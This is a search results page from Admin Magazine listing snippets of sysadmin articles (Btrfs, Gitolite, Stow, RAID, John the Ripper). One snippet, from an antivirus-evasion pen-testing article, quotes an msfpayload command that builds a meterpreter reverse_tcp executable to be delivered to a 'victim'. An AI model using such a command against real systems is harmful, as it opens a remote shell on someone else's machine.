Admin Magazine
 
  • News
  •  
  • Articles
  •  
  • Tech Tools
  •  
  • Subscribe
  •  
  • Archive
  •  
  • Whitepapers
  •  
  • Digisub
  •  
  • Write for Us!
  •  
  • Newsletter
  •  
  • Shop
  • DevOps
  • Cloud Computing
  • Virtualization
  • HPC
  • Linux
  • Windows
  • Security
  • Monitoring
  • Databases
  • all Topics...
Search
Login
ADMIN Magazine on Facebook
GooglePlus

Search

Refine your search
  • [x] Creation time: Last year
Sort order
  • Date
  • Score
Content type
  • Article (Print) (145)
  • Article (4)
Keywords

« Previous 1 2 3 4 5 6 7 8 ... 15 Next »

16%
A Btrfs field test and workshop
31.10.2025
Home »  Archive  »  2012  »  Issue 11: Cloud...  » 
© Adrian Hillman, 123RF.com
, followed by an installation guide using a virtual instance of Ubuntu 12.04 as an example. Then, I'll demonstrate the main administration tool. Following this, the root filesystem on a test system
16%
Using the Expect scripting environment
30.11.2025
Home »  Archive  »  2011  »  Issue 5: Pen Te...  » 
© Ivan Mikhaylov, 123RF.com
, and root. It sends the current user's public key to the remote host and adds it to the ~/.ssh/authorized_keys file for both remote users. It also changes the SSH configuration for the remote root user
16%
Managing computers with Rex
31.10.2025
Home »  Archive  »  2012  »  Issue 11: Cloud...  » 
© Stanislav Rishnyak, 123RF.com
01 user "root"; 02 03 Desc "Apache installation"; 04 task "apacheinstall", sub { 05 06 install package => "apache2"; 07 service "apache2" => "start"; 08 09 }; 10 11 Desc "Upload and sync
16%
Installing your own Git server
30.11.2025
Home »  Archive  »  2012  »  Issue 08: FreeNAS  » 
© Guido Vrol, 123RF.com
to download the software from GitHub: git clone git://github.com/sitaramc/gitolite Still working as root, run the install script, which installs the Gitolite programs globally: # gitolite
16%
Hiding a malicious file from virus scanners
30.11.2025
Home »  Archive  »  2012  »  Issue 08: FreeNAS  » 
© Ozphoto, Fotolia.com
the following command: # msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.245.134 LPORT=4444 X /root/Desktop/evi1.exe All that's left now is to deliver the executable to the victim, which requires some
16%
Centrally manage configuration files
26.03.2025
Home »  Archive  »  2025  »  Issue 86: Data...  » 
Photo by The New York Public Library on Unsplash
the package zsh with the zshrc file, you would call Stow as follows to generate a symbolic link in your home directory: stow --target $HOME --dir $HOME/dotfiles/ zsh The results are now: ls ~/.zshrc /root
16%
Efficient central management of Windows libraries
30.11.2025
Home »  Archive  »  2012  »  Issue 09: Windo...  » 
© tupungato, 123RF.com
the redirection options, and you need to create a root folder manually – that is, a central share that all users are allowed to access. Windows then automatically creates subfolders for the individual users
16%
Checking password complexity with John the Ripper
30.11.2025
Home »  Archive  »  2011  »  Issue 6: Perfor...  » 
Openwall's website. John the Ripper is a command-line utility that does not require administrative or root privileges to run against a password hash file. However, you will need administrative privileges
16%
Creating RAID systems with Raider
31.10.2025
Home »  Archive  »  2012  »  Issue 12: NAS S...  » 
©Slawomir Kruz, 123RF.com
option: Figure 2: The initial situation: a hard disk with a root and a swap partition. raider -R1 You don't need to state the disks/partitions here
16%
Enforce secure workstation configurations
28.07.2025
Home »  Archive  »  2025  »  Issue 88: 5 Net...  » 
Photo by Barnabas Piper on Unsplash
with the +i (immutable) attribute (line 37), preventing even root from modifying or deleting it without explicitly unsetting this flag. Meanwhile, systemd is configured to monitor the file. If a change

« Previous 1 2 3 4 5 6 7 8 ... 15 Next »

Service

  • Article Code
  • Contact
  • Legal Notice
  • Privacy Policy
  • Glossary
    • Backup Test
© 2026 Linux New Media USA, LLC – Legal Notice